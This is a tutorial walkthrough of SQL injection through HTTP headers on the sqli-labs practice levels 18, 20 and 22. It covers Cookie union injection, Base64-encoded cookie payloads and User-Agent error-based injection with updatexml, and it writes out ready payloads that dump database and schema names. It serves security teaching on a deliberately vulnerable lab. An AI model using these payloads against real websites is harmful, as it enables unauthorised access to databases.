Article directory
HTTP header injection
Cookie injection
Taking sqli-labs-20 as an example, use Cookie injection to obtain database information
1. Send to repeater
First enter the username Dumb and the password Dumb to log in
After logging in, refresh the page to capture packets and send them to the repeater
Determine the injection type in the repeater. After several attempts, it can be determined that the injection type is a character type, and it is a single quotation mark. If you don’t know how to judge the injection type, you can read my article:: MySQL injection type judgment method and principle analysis (demonstration sql statement execution command)
2. Judgment number of characters
After determining the injection type, and the page has an echo, you can use joint injection, you can refer to my article: Joint injection of MySQL
Enter at the cookie:
Cookie: uname=Dumb' and 1=2 union select 1,2,3#
It can be found that the echo points are at positions 2 and 3
3. Get database information
Cookie: uname=Dumb' and 1=2 union select 1,2,group_concat(schema_name) from information_schema.schemata#
The same is true for obtaining field information later. If you want to continue to view table information, field information, and detailed data information, you can refer to my article: Joint Injection of MySQL
base64 injection
Take sqli-labs-22 as an example, use base64 injection to obtain database information
send to repeater
First enter the username Dumb and the password Dumb to log in
After logging in, refresh the page to capture packets and send them to the repeater
Encoding and decoding process
It is found that the value in the cookie is url-encoded, so it needs to be decoded in the Decoder module. After decoding, it is found to be Base64, and it needs to be decoded by Base64. After getting the normal value, try sql injection, and then base64-encode the injection statement and put it in the cookie. The value can be.
sql injection
1. Determine the injection type
Perform base64 encoding through the following sql statement, and then judge by echoing
Dumb and 1=1# Dumb' and 1=2# Dumb' and 1=1# Dumb' and 1=2# Dumb" and 1=1# Dumb" and 1=2#
Finally, it can be judged that the injection type is a character type of double quotes. If you don’t know how to judge the injection type, you can read my article:: MySQL injection type judgment method and principle analysis (demonstration sql statement execution command)
2. Judgment number of characters
After determining the injection type, and the page has an echo, you can use joint injection, you can refer to my article: Joint injection of MySQL
Enter at the cookie:
Cookie: uname=RHVtYiIgb3JkZXIgYnkgNCM=
It can be inferred that the number of fields is only 3
3. Determine the echo position
Dumb" and 1=2 union select 1,2,3#
Base64 encoding will be performed, and then the cookie will be filled as follows:
Cookie: uname=RHVtYiIgYW5kIDE9MiB1bmlvbiBzZWxlY3QgMSwyLDMj
It can be judged that echoes are displayed at the 2nd and 3rd positions.
4. Obtain current database information through joint injection
Dumb" and 1=2 union select 1,2,database()#
Base64 encoding will be performed, and then the cookie will be filled as follows:
RHVtYiIgYW5kIDE9MiB1bmlvbiBzZWxlY3QgMSwyLGRhdGFiYXNlKCkj
As you can see, the current database information is successfully obtained
So this base64 injection is actually the same as the normal injection method, nothing more than an extra encoding and decoding step.
For common injection methods, you can read my article: Joint Injection of MySQL
User-Agent injection
Take sqli-labs-18 as an example, use User-Agent injection to obtain database information
#
Note: This level is similar to ordinary error injection, that is, it needs to capture the packet, and the injection point occurs in UserAgent, and it is used or --+
invalid when it is closed. You need to use the right closing method to replace the right side of the original sql The quotation marks are closed, so as to achieve the purpose of not reporting an error in the statement itself, and then use the updatexml function to make the sql statement report an error, so as to achieve the purpose of reporting error injection
Enter the user name and password casually, click submit, and then use BP to capture the packet and send it to the repeater
After testing the UserAgent, it is found that there are different echoes. After the single quote test, there is no data echo, but an error will be reported, indicating that it is a character injection of single quotes, so consider using error injection and modify the UA header to:
User-Agent: yuanboss' and updatexml(1,concat(0x7e,database(),0x7e),1) and '1' = '1
It can be found that the database has been found
What needs to be noted here is that the sql after I use #
or --+
comment is invalid, so the closing method on the right '
can also achieve the goal.